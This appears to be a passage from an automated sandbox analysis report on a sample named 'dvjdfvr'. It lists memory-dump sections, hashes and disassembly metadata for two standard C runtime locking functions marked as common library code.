                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                        • String ID:
                                                        • API String ID: 3521780317-0
                                                        • Opcode ID: 5cc3921896b7e27237e135982f2a553aadab4f3fbc7873ebab0ba24769980dcb
                                                        • Instruction ID: 77742b6cf000bf7e77ce78b262781fbc5e13f2c61f8d43118bf97c645c3be2ba
                                                        • Opcode Fuzzy Hash: 5cc3921896b7e27237e135982f2a553aadab4f3fbc7873ebab0ba24769980dcb
                                                        • Instruction Fuzzy Hash: A3F062B2A00B009ADB20FB65940675B33A0AF00754F12493FE4457B2E2CB7C5D429B5F
                                                        Function 00406000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 348 406000-40600b 349 406023-406031 EnterCriticalSection 348->349 350 40600d-406022 call 4048fc 348->350
                                                        APIs
                                                        • __lock.LIBCMT ref: 00406011
                                                          • Part of subcall function 004048FC: __mtinitlocknum.LIBCMT ref: 00404912
                                                          • Part of subcall function 004048FC: __amsg_exit.LIBCMT ref: 0040491E
                                                          • Part of subcall function 004048FC: EnterCriticalSection.KERNEL32(?,?,?,0040BBD5,00000004,00447678,0000000C,00409142,74DEDFA0,?,00000000,00000000,00000000,?,00407D4D,00000001), ref: 00404926
                                                        • EnterCriticalSection.KERNEL32(<&@,?,004035DB,00000001,00000000,004473B8,0000000C,00402BB7,%s %f %c,0040263C,00000000,00000030), ref: 0040602A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
                                                        • String ID: <&@
                                                        • API String ID: 3996875869-1731331922
                                                        • Opcode ID: 9d2972bc2bcdf00aea8c1df9b3eb594222670049efc057b9fb84da683caa3196
                                                        • Instruction ID: 7cfba0be80da9843e6674db2f376cd36685acf46a10c7e031dd1e3028032ab07
                                                        • Opcode Fuzzy Hash: 9d2972bc2bcdf00aea8c1df9b3eb594222670049efc057b9fb84da683caa3196
                                                        • Instruction Fuzzy Hash: D7D05B725002486BDB00DB9DD84AA4D37DCEB84338755C416F44DD7552CB39F5544E1C